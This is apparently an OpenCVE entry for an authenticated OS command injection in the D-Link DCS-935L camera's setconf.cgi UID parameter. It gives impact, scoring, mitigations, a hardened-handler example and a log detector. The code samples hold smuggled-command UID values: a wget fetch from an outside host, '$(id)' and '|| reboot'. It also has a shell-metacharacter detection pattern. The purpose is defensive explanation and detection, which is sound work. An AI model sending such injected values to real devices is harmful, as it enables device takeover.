Description
A vulnerability has been found in D-Link DCS-935L 1.10.01. This affects the function sub_400E40 of the file setconf.cgi of the component POST Parameter Handler. Such manipulation of the argument UID leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
Published: 2026-06-29
Score: 8.7 High
EPSS: 2.7% Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

An OS command injection flaw exists in setconf.cgi of D-Link DCS‑935L firmware 1.10.01. A crafted value for the POST parameter UID reaches the function sub_400E40, which passes it into a shell command without neutralising shell metacharacters, so attacker-controlled text is executed as additional commands. Successful exploitation lets an attacker run arbitrary commands on the device with the privileges of the process that serves setconf.cgi; the SSVC assessment records the technical impact as total, and on embedded devices of this kind the web process often runs as root, so this should be treated as full device compromise. Every published CVSS vector rates the attack as network-reachable with low complexity but requiring low-privilege authentication (PR:L / Au:S), so valid or default web-interface credentials are a precondition. The weakness is classified as CWE‑77 and CWE‑78, an input-neutralisation flaw leading to command execution.
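The pattern described above, as an added illustration that is not code from the DCS-935L firmware or from OpenCVE: sub_400E40 in setconf.cgi is native code and the page does not publish the command string it builds, so the helper path /bin/setuid_helper, the Password parameter and the UID allowlist rule are assumptions made for this example. It shows the vulnerable string-splicing form next to two mitigations (shell-quoting when a shell is unavoidable, and an allowlist plus argv list with no shell at all), and never executes the command.

```python
# Hypothetical example of the setconf.cgi UID command-injection class.
# Not the DCS-935L code: the helper path, the Password parameter and the
# allowlist rule are assumptions for this illustration.
import re
import shlex
from urllib.parse import unquote_plus

# Assumed policy: an account identifier is short and alphanumeric.
UID_ALLOWED = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def parse_post_body(body: str) -> dict:
    """Decode application/x-www-form-urlencoded into {name: value}.

    Done by hand (split on '&' only) so that a raw ';' in a value is never
    treated as a parameter separator, which older urllib versions do.
    """
    params = {}
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params[unquote_plus(name)] = unquote_plus(value)
    return params


def vulnerable_command(body: str) -> str:
    """The anti-pattern: splice the raw UID into a shell command line.

    Returns the string such a handler would hand to system()/popen(); this
    example never executes it. Everything after a ';' in UID becomes a
    second command for /bin/sh.
    """
    uid = parse_post_body(body).get("UID", "")
    return f"/bin/setuid_helper {uid}"


def quoted_command(body: str) -> str:
    """Mitigation when a shell is unavoidable: shell-quote the value so
    the whole UID is one word and metacharacters lose their meaning."""
    uid = parse_post_body(body).get("UID", "")
    return f"/bin/setuid_helper {shlex.quote(uid)}"


def hardened_argv(body: str) -> list:
    """Preferred fix: strict allowlist, then an argv list with no shell.

    The caller would pass this to subprocess.run(argv) (execve in C), so
    metacharacters are never interpreted even if the allowlist is later
    loosened.
    """
    uid = parse_post_body(body).get("UID", "")
    if not UID_ALLOWED.fullmatch(uid):
        raise ValueError(f"rejected UID value: {uid!r}")
    return ["/bin/setuid_helper", uid]


if __name__ == "__main__":
    crafted = "UID=admin%3Bid&Password=x"  # constructed attacker body
    print(vulnerable_command(crafted))      # shell would run "id" as a second command
    print(quoted_command(crafted))          # 'admin;id' is now a single argument
    try:
        hardened_argv(crafted)
    except ValueError as exc:
        print("hardened handler:", exc)
    print(hardened_argv("UID=user01&Password=x"))
```

The allowlist is the part that changes the most per device: it should match whatever account-name format the firmware actually accepts, and rejecting on failure is safer than stripping characters, because stripping can be bypassed with encodings the filter did not anticipate.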

Affected Systems

The affected devices are D‑Link DCS‑935L units (a Wi‑Fi IP camera, not a router) running firmware version 1.10.01. No other versions or models are listed as affected in the current records; the CPE entry (cpe:2.3:h:d-link:dcs-935l:*:*:*:*:*:*:*:*) carries no version constraint, so other firmware versions have not been confirmed either way.

Risk and Exploitability

The CVSS 4.0 score of 8.7 classifies this flaw as high severity: network attack vector, low attack complexity, no user interaction, but low privileges required (PR:L), meaning the attacker must first authenticate to the camera's web interface. The EPSS score of 2.7% indicates a low but non‑zero probability of in‑the‑wild exploitation over the next 30 days, while the public proof of concept (SSVC Exploitation: poc, CVSS E:P) means attack tooling already exists. It is not listed in the CISA KEV catalog. The overall risk remains high because the web interface is typically network‑reachable, an exploit is public, and no vendor patch has been confirmed.

Generated by OpenCVE AI on July 2, 2026 at 11:58 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Install the firmware update from D‑Link that removes the command injection in setconf.cgi once one is published; no fix was available at the time of this analysis.
  • Until then, keep the camera's web interface off the internet: disable remote access and restrict the interface to a trusted management network or IP range so the vulnerable endpoint is not reachable.
  • Because exploitation requires authentication (PR:L), replace default or shared web‑interface credentials with strong unique ones and rotate them; this raises the bar but does not remove the flaw.
  • Deploy a web application firewall or similar filtering in front of the device to reject POST requests to setconf.cgi whose UID value contains shell metacharacters (; | & ` $ ( ) < > newline, quotes) or does not match the expected account‑name format.
  • Monitor logs from the device and from any upstream proxy or IDS for POST activity to setconf.cgi with unusual UID values, and investigate any anomalies; a flagged request from an authenticated session also indicates compromised credentials.
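Detection logic for the filtering and monitoring recommendations above, as an added example rather than OpenCVE's or D-Link's code. It assumes request bodies are visible to the log source (a reverse proxy, IDS or PCAP extractor in front of the camera); nothing on this page says the DCS-935L's own web log records POST bodies. The line format, the addresses and the request bodies are constructed for the example.

```python
# Added detection example for POSTs to setconf.cgi with a hostile UID.
# Assumes a log source that records request bodies (proxy/IDS/PCAP); the
# log format, addresses and bodies below are constructed, not real data.
import re
from urllib.parse import unquote_plus

# Characters that let a value escape a shell word or start a new command.
SHELL_META = re.compile(r"[;&|`$(){}<>'\"\\\n\r]")
# Same assumed policy as for the handler: short alphanumeric identifiers.
UID_ALLOWED = re.compile(r"[A-Za-z0-9_.-]{1,32}")
# Constructed log format: <timestamp> <client> <method> <path> body="..."
LINE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<path>\S+) body="(?P<body>[^"]*)"$'
)


def parse_post_body(body: str) -> dict:
    """Decode a form body by hand so a raw ';' is never a separator."""
    params = {}
    for pair in body.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params[unquote_plus(name)] = unquote_plus(value)
    return params


def inspect_line(line: str):
    """Return (client, decoded UID, reasons) for a suspicious setconf.cgi POST,
    or None for lines that are not POSTs to that endpoint or look benign."""
    m = LINE.match(line)
    if m is None or m["method"] != "POST" or not m["path"].endswith("/setconf.cgi"):
        return None
    params = parse_post_body(m["body"])
    if "UID" not in params:
        return None
    uid = params["UID"]
    reasons = []
    if SHELL_META.search(uid):
        reasons.append("shell metacharacter in UID")
    if not UID_ALLOWED.fullmatch(uid):
        reasons.append("UID outside expected account-name format")
    return (m["src"], uid, reasons) if reasons else None


def scan(lines) -> list:
    """Run inspect_line over a log and keep only the hits."""
    return [hit for hit in map(inspect_line, lines) if hit is not None]


SAMPLE_LOG = [  # constructed sample lines; 192.0.2.10 is the legitimate admin
    '2026-07-01T08:00:01Z 192.0.2.10 POST /setconf.cgi body="UID=admin&Password=s3cret"',
    '2026-07-01T08:00:05Z 203.0.113.7 POST /setconf.cgi body="UID=admin%3Bwget+http%3A%2F%2F203.0.113.7%2Fx+-O+%2Ftmp%2Fx&Password=x"',
    '2026-07-01T08:00:09Z 203.0.113.7 POST /setconf.cgi body="UID=%24%28id%29&Password=x"',
    '2026-07-01T08:00:12Z 192.0.2.10 GET /status.cgi body=""',
    '2026-07-01T08:00:15Z 198.51.100.3 POST /setconf.cgi body="UID=a%27+%7C%7C+reboot&Password=x"',
]

if __name__ == "__main__":
    for src, uid, reasons in scan(SAMPLE_LOG):
        print(f"{src}: UID={uid!r} -> {', '.join(reasons)}")
```

The check decodes the body before matching, so percent-encoded and plus-encoded payloads are caught; it deliberately ignores GET requests and POSTs to other CGIs, which keeps the rule narrow enough to run as a WAF block rather than only an alert. Because the vulnerable request is authenticated, each hit also names a client that holds valid credentials, which is the account to reset.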



Advisories

No advisories yet.

History

Mon, 29 Jun 2026 15:30:00 +0000

Type     | Values Removed | Values Added
Metrics  | (none)         | ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Mon, 29 Jun 2026 08:45:00 +0000

Type                | Values Removed | Values Added
Description         | (none)         | A vulnerability has been found in D-Link DCS-935L 1.10.01. This affects the function sub_400E40 of the file setconf.cgi of the component POST Parameter Handler. Such manipulation of the argument UID leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
Title               | (none)         | D-Link DCS-935L POST Parameter setconf.cgi sub_400E40 os command injection
First Time appeared | (none)         | D-link; D-link dcs-935l
Weaknesses          | (none)         | CWE-77; CWE-78
CPEs                | (none)         | cpe:2.3:h:d-link:dcs-935l:*:*:*:*:*:*:*:*
Vendors & Products  | (none)         | D-link; D-link dcs-935l
References          | (none)         | (none)
Metrics             | (none)         | cvssV2_0: {'score': 9, 'vector': 'AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:ND/RC:UR'}
                    |                | cvssV3_0: {'score': 8.8, 'vector': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:X/RC:R'}
                    |                | cvssV3_1: {'score': 8.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:X/RC:R'}
                    |                | cvssV4_0: {'score': 8.7, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P'}


MITRE

Status: PUBLISHED

Assigner: VulDB

Published:

Updated: 2026-06-29T14:52:35.010Z

Reserved: 2026-06-28T10:17:07.204Z

Link: CVE-2026-13545

Vulnrichment

Updated: 2026-06-29T14:13:39.769Z

NVD

No data.

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-07-02T12:00:11Z

Weaknesses
  • CWE-77

    Improper Neutralization of Special Elements used in a Command ('Command Injection')

  • CWE-78

    Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')